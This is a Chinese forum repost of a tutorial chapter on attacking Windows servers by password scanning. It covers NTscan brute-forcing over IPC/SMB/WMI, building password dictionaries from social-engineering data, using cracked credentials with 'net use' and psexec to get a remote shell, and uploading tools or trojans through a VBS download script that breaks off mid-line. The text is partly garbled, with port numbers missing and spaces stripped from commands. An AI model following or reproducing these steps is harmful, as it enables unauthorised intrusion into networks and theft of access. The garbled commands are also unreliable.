编程语言应用

首页 » 常识 » 预防 » 密码系列攻防文章连载77Windows口

TUhjnbcbe - 2021/5/23 21:52:00

文案策划招聘求职微信群 http://www.hn51.net/shenghuo/lehuo/887.html
在Windows操作系统渗透过程中，除了SQL注入、Web服务漏洞攻击等方式外，还有一种攻击方式，即暴力破解，对或者内网的服务器进行口令扫描攻击，以获取更多的服务器权限。这种攻击尤其是在拥有一台或者多台服务器权限后，目前口令扫描有Hscan、NTscan等，本章主要介绍如何进行口令扫描以及利用tscrack、FastRDPBrute等工具软件来暴力破解口令，最终获取服务器权限。7.1口令扫描准备工作

在进行口令扫描前需要做一些准备工作，收集信息越多，越有可能成功获取内网服务器权限。例如掌握一定权限后，通过邮箱帐号等信息，进行社工密码收集，对用户的密码进行规律分析和社工字典生成。

1.确定需要扫描的IP地址或者IP地址段

.收集用户名和密码，常见的是Administrator为用户较多，但在内网中，很多用户都喜欢使用个性化名字进行登录，因此需要收集一些用户名；密码字典的整理尤其重要，可以包含网站使用过的密码，社工库邮件地址或者用户名查询到的密码，公司名称，电话号码，出生日期，手机号码，QQ号码等。

3.编辑密码和口令配置文件

7.使用NTScan扫描口令实例

Windows口令扫描攻击主要针对某一个IP地址或者某一个网段进口令扫描，实质是通过、等端口来尝试建立连接，其利用的是Dos命令“netuse\\ipaddress\admin$“password”/u:user”，只不过通过程序来实现而已。下面的案例通过扫描软件NTScan来扫描口令，扫描出口令后成功实施控制的案例。

1.设置NTScan

直接运行NTscan，在NTscan中一般只需要设置开始IP和结束IP两个地方，其它设置均可以采取默认，如图1所示。

图1设置NTscan

说明

①如果是在肉鸡上面精细管理扫描，由于语言版本的不同，如果操作系统不支持中文显示，就有可能显示为乱码，这个时候设置就只能凭熟悉度来进行设置，在本例中是在英文操作系统中使用NTscan，在其运行界面中一些汉字显示为“？”，但是不影响扫描使用，如图所示。

图NTscan乱码显示

②在NTscan中有IPC、SMB和WMI三种扫描方式，第一种和第三种方式扫描口令较为有效，第二种主要用来扫描共享文件。利用IPC$可以与目标主机建立一个空的连接而无需用户名与密码，而且还可以得到目标主机上的用户列表。SMB（服务器信息块）协议是一种IBM协议，用于在计算机间共享文件、打印机、串口等。SMB协议可以用在因特网的TCP/IP协议之上，也可以用在其它网络协议如IPX和NetBEUI之上。

③WMI（Windows管理规范）是一项核心的Windows管理技术，WMI作为一种规范和基础结构，通过它可以访问、配置、管理和监视几乎所有的Windows资源，比如用户可以在远程计算机器上启动一个进程；设定一个在特定日期和时间运行的进程；远程启动计算机；获得本地或远程计算机的已安装程序列表；查询本地或远程计算机的Windows事件日志等等。一般情况下，在本地计算机上执行的WMI操作也可以在远程计算机上执行，只要用户拥有该计算机的管理员权限。如果用户对远程计算机拥有权限并且远程计算机支持远程访问，那么用户就可以连接到该远程计算机并执行拥有相应权限的操作。

.执行扫描

在NTscan运行界面中单击“开始”按钮或者单击左窗口下面的第一按钮（如果显示为乱码），开始扫描，如图3所示。

图3扫描口令

说明

①NTscan扫描口令跟字典有关，其原理就是使用字典中的口令跟实际口令进行对比，如果相同即可建立连接，即破解成功，破解成功后会在下方显示。

②NTscan的字典文件为NT_pass.dic，用户文件为NT_user.dic，可以根据实际情况对字典文件和用户文件内容进行修改。

③NTscan扫描结束后，会在NTscan程序当前目录下生成一个NTscan.txt文件，该文件记录扫描结果，如图4所示。

图4NTscan扫描记录文件

④在NTscan中还有一些辅助功能，例如右键单击后可以执行“cmd”命令，左键单击后可以执行“连接”、“打开远程登陆”以及“映射网络驱动器”等命令，如图5所示。

图5NTscan辅助功能

3.实施控制

在Dos命令提示符下输入“netuse\\1.*.*.*\admin$"mrs"/u:administrator”命令获取主机的管理员权限。命令执行成功，如图6所示。

图6建立连接

4.执行Psexec命令

输入“psexec\\1.*.*.*cmd”命令获取一个DosShell，如图7所示。

图7获取DosShell

说明

①以上两步可以合并，直接在Dos命令提示符下输入“psexec\\ipaddress–uadministrator－ppasswordcmd”。例如在上例中可以输入“psexec\\1.*.*.*-uAdministrator–pmrscmd”命令来获取一个Dos下的Shell。

②在有些情况下使用“psexec\\ipaddress–uadministrator－ppasswordcmd”命令不能正常执行。

5.从远端查看被入侵计算机端口开放情况

使用“sfind–p1.*.*.*”命令查看远程主机端口开放情况，该主机仅仅开放了端口，如图8所示。

图8查看端口开放情况

6.上传文件

在该DosShell下执行文件下载命令，将一些工具软件或者木马软件上传的被攻击计算机上面，如图9所示。

图9上传文件

说明

①可以使用以下vbs脚本命令来上传文件。

echowithwscript:if.arguments.count^then.quit:endifdl.vbe

echosetaso=.createobject("adodb.stream"):setweb=createobject("microsoft.xml

1

查看完整版本: 密码系列攻防文章连载77Windows口

Powered by Discuz!NT Archiver 3.6.711 2001-2024 Comsenz Inc.